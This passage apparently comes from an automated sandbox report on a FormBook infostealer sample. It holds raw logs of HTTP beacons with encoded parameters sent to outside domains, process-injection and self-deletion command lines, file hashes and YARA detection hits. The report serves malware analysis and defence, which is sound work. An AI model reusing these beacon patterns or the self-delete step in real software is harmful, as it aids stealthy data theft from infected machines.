                                        0192.168.2.54975152.20.84.6280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 3, 2021 18:14:43.211031914 CEST9212OUTGET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1
                                        Host: www.aideliveryrobot.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Aug 3, 2021 18:14:43.349148989 CEST9212INHTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Tue, 03 Aug 2021 16:14:43 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.549752198.185.159.14480C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 3, 2021 18:14:48.519578934 CEST9213OUTGET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1
                                        Host: www.anewdistraction.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Aug 3, 2021 18:14:48.629916906 CEST9215INHTTP/1.1 400 Bad Request
                                        Cache-Control: no-cache, must-revalidate
                                        Content-Length: 77564
                                        Content-Type: text/html; charset=UTF-8
                                        Date: Tue, 03 Aug 2021 16:14:48 UTC
                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        Pragma: no-cache
                                        Server: Squarespace
                                        X-Contextid: tR1je8UA/ztYBl6qL
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:18:12:44
                                        Start date:03/08/2021
                                        Path:C:\Users\user\Desktop\JFBlvEr5H9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\JFBlvEr5H9.exe'
                                        Imagebase:0x540000
                                        File size:1336832 bytes
                                        MD5 hash:214B1DDF045E4D6FDD73A5C8788D2ADC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:18:12:55
                                        Start date:03/08/2021
                                        Path:C:\Users\user\Desktop\JFBlvEr5H9.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\JFBlvEr5H9.exe
                                        Imagebase:0xa70000
                                        File size:1336832 bytes
                                        MD5 hash:214B1DDF045E4D6FDD73A5C8788D2ADC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:18:12:58
                                        Start date:03/08/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff693d90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:13:40
                                        Start date:03/08/2021
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0x1330000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:18:13:42
                                        Start date:03/08/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
                                        Imagebase:0x150000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:13:42
                                        Start date:03/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >